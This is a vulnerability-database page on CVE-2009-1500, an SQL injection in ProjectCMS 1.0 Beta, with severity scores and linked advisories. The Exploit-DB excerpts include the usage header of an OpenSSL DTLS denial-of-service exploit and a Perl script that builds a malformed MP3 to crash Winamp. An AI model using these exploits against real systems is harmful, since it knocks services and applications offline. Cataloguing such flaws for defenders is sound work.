CVE-2009-1500
published 2009-05-01CVE-2009-1500: SQL injection vulnerability in index.php in ProjectCMS 1.0 Beta allows remote attackers to execute arbitrary SQL commands via the sn parameter.
PriorityP336medium6.8CVSS 2.0
AVNACMAuNCPIPAP
EXPLOIT
EPSS
0.93%
56.0th percentile
SQL injection vulnerability in index.php in ProjectCMS 1.0 Beta allows remote attackers to execute arbitrary SQL commands via the sn parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| projectcms | projectcms | — | — |
CVSS provenance
nvdv2.06.8MEDIUMAV:N/AC:M/Au:N/C:P/I:P/A:P
vendor_redhat7.8HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-47m7-8f3p-r894: SQL injection vulnerability in index
ghsa_unreviewed·2022-05-02
CVE-2009-1500 [MEDIUM] CWE-89 GHSA-47m7-8f3p-r894: SQL injection vulnerability in index
SQL injection vulnerability in index.php in ProjectCMS 1.0 Beta allows remote attackers to execute arbitrary SQL commands via the sn parameter.
Red Hat
kernel: flood ping cause out-of-iommu error and panic when mtu larger than 1500
vendor_redhat·2007-11-28·CVSS 7.8
CVE-2009-3613 [HIGH] kernel: flood ping cause out-of-iommu error and panic when mtu larger than 1500
kernel: flood ping cause out-of-iommu error and panic when mtu larger than 1500
The swiotlb functionality in the r8169 driver in drivers/net/r8169.c in the Linux kernel before 2.6.27.22 allows remote attackers to cause a denial of service (IOMMU space exhaustion and system crash) by using jumbo frames for a large amount of network traffic, as demonstrated by a flood ping.
No detection rules found.
Exploit-DB
OpenSSL 0.9.8k/1.0.0-beta2 - DTLS Remote Memory Exhaustion Denial of Service
exploitdb·2009-05-18·CVSS 5.0
CVE-2009-1379 [MEDIUM] OpenSSL 0.9.8k/1.0.0-beta2 - DTLS Remote Memory Exhaustion Denial of Service
OpenSSL 0.9.8k/1.0.0-beta2 - DTLS Remote Memory Exhaustion Denial of Service
---
/*
* cve-2009-1378.c
*
* OpenSSL
* http://jon.oberheide.org
*
* Information:
*
* http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1378
*
* In dtls1_process_out_of_seq_message() the check if the current message is
* already buffered was missing. For every new message was memory allocated,
* allowing an attacker to perform an denial of service attack with sending
* out of seq handshake messages until there is no memory left.
*
* Usage:
*
* Pass the host and port of the target DTLS server:
*
* $ gcc cve-2009-1378.c -o cve-2009-1378
* $ ./cve-2009-1378 1.2.3.4 666
*
* Notes:
*
* With a MTU of 1500, the attack leaks 1503 bytes of memory with each UDP
* datagram. If you have a bigger MTU than 1500, feel free
Exploit-DB
ProjectCMS 1.0b - 'index.php?sn' SQL Injection
exploitdb·2009-04-29
CVE-2009-1500 ProjectCMS 1.0b - 'index.php?sn' SQL Injection
ProjectCMS 1.0b - 'index.php?sn' SQL Injection
---
** **
** **
** [] [] [] [][][][> [] [] [][ ][] [] [][]] [] [> [][][][> [][][][] **
** || || || [] [][] [] [] [] [] [] [] [] [] [] [] **
** [> [][][][] [][][][> [] [] [] [] [] [][] [] [][] [][][][> [] [] **
** [-----[]-----[][][][>--[]--[]-[]---[][][]--[]-[]--[]--------[]-----[][][][>--[][][][]---\
**==[> [] [] [] [][] [] [] [][][] [] [][] [] [] [] >>--
** [----[[]]----[]--- ----[]-----[]---[]--[]-----[]--[]-------[] []---[]----------[]--[]---/
[> [[[]]] [][][][> [][] [] [][[] [[]] [][] [][][] [] [> [][][][> WEB: http://projectcms.org/ |
|-->DOWNLOAD: http://projectcms.org/uploads/projectcms_1.0_BETA.zip |
|-->DEMO: http://projectcms.org |
|-->CATEGORY: CMS / Portal |
|-->DESCRIPTION: ProjectCMS is an open source community project to crea
Exploit-DB
Winamp 5.541 - '.mp3'/'.aiff' File Multiple Denial of Service Vulnerabilities
exploitdb·2009-01-12
CVE-2009-0263 Winamp 5.541 - '.mp3'/'.aiff' File Multiple Denial of Service Vulnerabilities
Winamp 5.541 - '.mp3'/'.aiff' File Multiple Denial of Service Vulnerabilities
---
################################################################################################################################
#Winamp
#!/usr/bin/perl
use strict;
my $mp3 =
"\x49\x44\x33\x00\x00\x00\x00\x00\x09\x07\x54\x49\x54\x32\x00\x00\x00\x08\x00\x00\x00".
"\x50\x69\x73\x74\x65\x20\x35\x54\x50\x45\x31\x00\x00\x00\x05\x00\x00\x00\x41\x6e".
"\x69\x73\x54\x41\x4c\x42\x00\x00\x00\x0d\x00\x00\x00\x62\x6c\x61\x62\x6c\x61\x20".
"\x44\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
my $mp32 =
"\x20" x 1500;
open(out, "> test.mp3");
binmode(out);
print (out $mp3, $mp32);
close(out);
#### Winamp A
2009-05-01
Published